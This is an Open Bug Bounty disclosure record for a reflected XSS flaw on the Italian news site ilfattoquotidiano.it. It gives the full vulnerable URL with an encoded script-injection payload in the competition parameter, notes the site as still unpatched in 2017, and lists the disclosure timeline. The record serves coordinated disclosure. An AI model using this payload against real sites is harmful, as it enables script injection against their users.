ilfattoquotidiano.it XSS vulnerability

2016-02-09T08:08:00
ID OBB:133487
Type openbugbounty
Reporter tbm
Modified 2016-05-03T08:11:00

Description

Vulnerable URL:
http://www.ilfattoquotidiano.it/calcio/diretta/?competition=21%27%22%3E%3CScRiPt%20%3Ealert%28/XSSPOSED/%29%3C/ScRiPt%3E&match;=828610&season;=2015
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1594
Google Pagerank| 6
VIP website status:| Yes
Check ilfattoquotidiano.it SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 February, 2016 08:08 GMT
Generic security notifications sent to website owner| 9 February, 2016 08:10 GMT
Vulnerability details disclosed by researcher| 3 May, 2016 08:11 GMT